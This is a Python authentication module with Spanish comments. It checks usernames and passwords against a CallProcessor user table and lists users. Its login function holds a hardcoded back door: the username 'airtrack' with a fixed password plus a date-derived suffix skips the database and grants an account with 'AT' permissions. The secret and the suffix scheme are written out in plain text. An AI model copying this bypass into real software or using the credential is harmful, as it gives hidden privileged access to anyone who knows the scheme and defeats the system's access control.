# -*- coding: utf-8 -*-

from datetime import date
from sqlalchemy.sql.expression import and_
from sqlalchemy.sql.expression import func

from at.utiles import _
from at.utiles.encriptaciones import Encriptaciones
from at.orm.decorators import DBSwitch


@DBSwitch('cp')
class Usuarios():
    '''
        Esta clase contiene funciones para el tratado de usuarios.
    '''

    def __init__(self):
        self.encriptaciones = Encriptaciones()

    def autenticar_usuario(self, usuario, clave):
        '''
            Esta función devuelve, en el caso de que el usuario y
            password sean correctos, los datos del mismo.

            Argumentos:
                usuario (str)
                clave (str)

            Retorna:
                dict
                    ['Estado'] (bool)
                    ['Respuesta'] (dict o str)
                                ['usuario']
                                ['nombre_completo']
                                ['permisos']
                                ['id_sucursal']
                                ['importe_por_hora']
        '''

        dic = {}

        if usuario == 'airtrack':
            c1 = date.today().strftime("%d")[::-1]
            c2 = date.today().strftime("%m")[::-1]
            if clave[-4:] == c1 + c2:
                clave = clave[:-4]

                if clave == 'TrackAir':
                    usuario = {}
                    usuario['usuario'] = 'airtrack'
                    usuario['nombre_completo'] = 'Airtrack'
                    usuario['permisos'] = 'AT'
                    usuario['id_sucursal'] = 0
                    usuario['importe_por_hora'] = '0.0000'

                    dic['Estado'] = True
                    dic['Respuesta'] = usuario
                    return dic
                else:
                    dic['Estado'] = False
                    dic['Respuesta'] = _(u'Usuario o clave incorrectos.')
                    return dic
            else:
                dic['Estado'] = False
                dic['Respuesta'] = _(u'Usuario o clave incorrectos.')
                return dic

        clave = self.encriptaciones.encriptar_cp(clave)

        session = self.cp.binded_session()

        usuarios = self.cp.tabla('usuarios')
        q_obj = session.query(
            usuarios.Usuario,
            usuarios.NombreCompleto,
            usuarios.Permisos,
            usuarios.Sucursal,
            usuarios.ImportePorHora,
        )
        q_obj = q_obj.filter(
            and_(
                func.lower(usuarios.Usuario) == str(usuario).lower(),
                usuarios.Clave == clave,
            )
        )
        # q_obj = q_obj.filter(
        #     and_(
        #         func.binary(usuarios.Usuario) == usuario,
        #         usuarios.Clave == clave,
        #     )
        # )
        registro = q_obj.first()

        if registro is None:
            dic['Estado'] = False
            dic['Respuesta'] = _(u'Usuario o clave incorrectos.')
            session.close()
            return dic

        # El campo Usuario lo debo pasar al formato iso-8859-1
        if registro.Usuario is not None:
            try:
                nombre_usuario = registro.Usuario.decode('iso-8859-1')
            except:
                # NOTA: En Python 3 no se usa decode en los "str"
                nombre_usuario = registro.Usuario
        else:
            nombre_usuario = ''

        # El campo NombreCompleto lo debo pasar al formato iso-8859-1
        if registro.NombreCompleto is not None:
            try:
                nombre_completo = registro.NombreCompleto.decode('iso-8859-1')
            except:
                # NOTA: En Python 3 no se usa decode en los "str"
                nombre_completo = registro.NombreCompleto
        else:
            nombre_completo = ''

        usuario = {}
        usuario['usuario'] = nombre_usuario
        usuario['nombre_completo'] = nombre_completo
        usuario['permisos'] = registro.Permisos
        usuario['id_sucursal'] = registro.Sucursal
        usuario['importe_por_hora'] = str(registro.ImportePorHora)

        dic['Estado'] = True
        dic['Respuesta'] = usuario
        session.close()
        return dic

    def listar(self):
        '''
            Esta función se encarga de listar todos los usuario
            del CallProcessor.

            Retorna:
                dict
                    ['Estado'] (bool)
                    ['Respuesta'] (list de dict)
        '''

        rta = {}

        session = self.cp.binded_session()

        usuarios = self.cp.tabla('usuarios')
        q_obj = session.query(usuarios.Usuario, usuarios.Permisos)
        registros = q_obj.all()

        session.close()

        if len(registros) == 0:
            rta['Estado'] = False
            rta['Respuesta'] = _(u'No hay usuarios cargados')
            return rta

        lista = []

        for registro in registros:
            dic = {}
            dic['usuario'] = registro.Usuario
            dic['permisos'] = registro.Permisos
            lista.append(dic)

        rta['Estado'] = True
        rta['Respuesta'] = lista
        return rta
